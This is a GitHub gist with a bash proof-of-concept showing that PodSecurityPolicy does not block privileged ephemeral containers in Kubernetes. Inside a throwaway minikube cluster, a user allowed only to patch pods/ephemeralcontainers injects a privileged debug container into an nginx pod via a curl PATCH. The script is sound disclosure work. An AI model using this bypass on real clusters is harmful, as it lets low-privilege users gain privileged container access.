Last active
July 25, 2022 16:06
-
-
Save mtardy/89e0a49fbe50c8fd6963ddc06fd9086b to your computer and use it in GitHub Desktop.
Small POC to demonstrate the problem of not filtering the creation of ephemeral containers at the admission control level, it uses minikube, kubectl and curl as dependencies.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -e | |
set -o pipefail | |
function print { | |
printf "\n[+] $1\n" | |
} | |
function retry_for_command_success { | |
n=0; until ((n >= 60)); do | |
eval "$1" && break; | |
n=$((n + 1)); | |
sleep 1; | |
done; ((n < 60)) | |
} | |
KUBERNETES_VERSION="v1.24.1" | |
# Creating a k8s cluster with PSP on with minikube | |
minikube start --kubernetes-version=$KUBERNETES_VERSION --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy --addons=pod-security-policy | |
print "Checking that PSP are enabled" | |
kubectl get psp | |
print "Waiting for the cluster to be ready, i.e. the default serviceaccount to be created" | |
retry_for_command_success "kubectl -n default get serviceaccount default -o name" | |
print "Creating a regular nginx pod with admin cred" | |
kubectl run nginx --image=nginx | |
print "Creating a fake user with only patch on pods/ephemeralcontainers" | |
kubectl create serviceaccount fake-user | |
kubectl create role fake-debugger --verb=patch --resource=pods/ephemeralcontainers | |
kubectl create rolebinding fake-debugger-binding --role=fake-debugger --user=fake-user | |
print "Listing fake user rights" | |
kubectl --as=fake-user auth can-i --list | |
print "Opening API proxy as fake user" | |
kubectl proxy --as=fake-user & | |
# stop the proxy background process in case of termination | |
trap "kill $!" SIGINT SIGTERM EXIT | |
print "Sleeping for a few seconds for the proxy to open" | |
sleep 3 | |
print "Waiting for the nginx pod to be ready" | |
kubectl wait --for=condition=Ready pod/nginx | |
print "Sending the patch for the privileged ephemeral container as the fake user" | |
curl localhost:8001/api/v1/namespaces/default/pods/nginx/ephemeralcontainers \ | |
-XPATCH \ | |
-H 'Content-Type: application/strategic-merge-patch+json' \ | |
-d ' | |
{ | |
"spec": | |
{ | |
"ephemeralContainers": | |
[ | |
{ | |
"name": "debugger", | |
"command": ["kdigger", "dig", "cap"], | |
"image": "nixery.dev/kdigger", | |
"targetContainerName": "nginx", | |
"securityContext": { | |
"privileged": true | |
}, | |
"stdin": true, | |
"tty": true | |
} | |
] | |
} | |
}' | |
echo | |
print "Trying to get the logs from the privileged debug container to verify that it is privileged. Wait until the container image is downloaded and the container is done!" | |
retry_for_command_success "kubectl logs nginx -c debugger" | |
print "Removing the minikube cluster, you can use \"minikube delete --purge\" to remove everything in the ~/.minikube folder or just delete that folder." | |
minikube delete |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment